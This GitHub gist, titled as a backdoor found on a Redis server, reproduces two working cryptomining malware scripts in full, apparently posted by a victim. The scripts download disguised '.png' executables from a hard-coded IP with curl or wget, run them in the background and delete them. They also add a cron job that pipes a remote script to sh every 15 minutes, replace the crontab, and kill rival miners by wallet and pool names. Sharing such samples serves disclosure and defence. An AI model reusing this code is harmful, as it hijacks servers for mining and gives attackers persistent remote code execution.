Last active
June 2, 2018 07:26
-
-
Save voduytuan/74d03606a2ee72dba9799ade69a4d78c to your computer and use it in GitHub Desktop.
Backdoor found on redis server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #get from | |
| # curl http://185.169.198.42/assets/Circle_AA.png|sh | |
| export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin | |
| AGENT_FILE='/tmp/Circle_MI.png' | |
| AGENT_CONFIG='/tmp/Circle_CF.png' | |
| ps -ef|grep $AGENT_FILE|grep -v grep | |
| if [ $? -ne 0 ]; then | |
| if [ -x /usr/bin/wget ] ; then | |
| wget -q http://185.169.198.42/assets/Circle_MI.png -O $AGENT_FILE | |
| wget -q http://185.169.198.42/assets/Circle_CF.png -O $AGENT_CONFIG | |
| elif [ -x /usr/bin/curl ] ; then | |
| curl -o $AGENT_FILE http://185.169.198.42/assets/Circle_MI.png | |
| curl -o $AGENT_CONFIG http://185.169.198.42/assets/Circle_CF.png | |
| else | |
| exit 0; | |
| fi | |
| chmod +x $AGENT_FILE | |
| nohup $AGENT_FILE -c $AGENT_CONFIG -k > /dev/null 2>&1 & | |
| sleep 10 | |
| rm -rf $AGENT_FILE | |
| rm -rf $AGENT_CONFIG | |
| fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #get from | |
| # curl http://185.169.198.42/assets/Circle_JJ.png | sh | |
| export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin | |
| days=$(($(date +%s) / 60 / 60 / 24)) | |
| DoMine() | |
| { | |
| rm -rf /tmp/Circle_* | |
| ps -ef|grep Circle_MI.png|grep -v grep | |
| if [ $? -ne 0 ]; then | |
| if [ -x /usr/bin/wget ] ; then | |
| wget -q http://185.169.198.42/assets/Circle_MI.png -O /tmp/Circle_MI.png | |
| wget -q http://185.169.198.42/assets/Circle_CF.png -O /tmp/Circle_CF.png | |
| elif [ -x /usr/bin/curl ] ; then | |
| curl -o /tmp/Circle_MI.png http://185.169.198.42/assets/Circle_MI.png | |
| curl -o /tmp/Circle_CF.png http://185.169.198.42/assets/Circle_CF.png | |
| else | |
| exit 0; | |
| fi | |
| chmod +x /tmp/Circle_MI.png | |
| nohup /tmp/Circle_MI.png -c /tmp/Circle_CF.png -k > /dev/null 2>&1 & | |
| sleep 10 | |
| rm -rf /tmp/Circle_MI.png | |
| rm -rf /tmp/Circle_CF.png | |
| if [ -x /usr/bin/wget ] ; then | |
| echo '*/15 * * * * wget -q http://185.169.198.42/assets/Circle_AA.png -O - |sh' > /tmp/.cron | |
| elif [ -x /usr/bin/curl ] ; then | |
| echo '*/15 * * * * curl http://185.169.198.42/assets/Circle_AA.png|sh' > /tmp/.cron | |
| else | |
| exit 0; | |
| fi | |
| crontab -r | |
| crontab /tmp/.cron | |
| sleep 3 | |
| rm /tmp/.cron | |
| fi | |
| } | |
| ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9 | |
| pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4 | |
| pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB | |
| pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df | |
| pkill -f cpuloadtest | |
| pkill -f crypto-pool | |
| pkill -f xmr | |
| pkill -f prohash | |
| pkill -f monero | |
| pkill -f miner | |
| pkill -f nanopool | |
| pkill -f minergate | |
| pkill -f yam | |
| pkill -f yam2 | |
| pkill -f minerd | |
| pkill -f Circle_MI.png | |
| pkill -f curl | |
| ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9 | |
| ps auxf|grep -v grep|grep "11231" || DoMine |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
we got this things, said. :(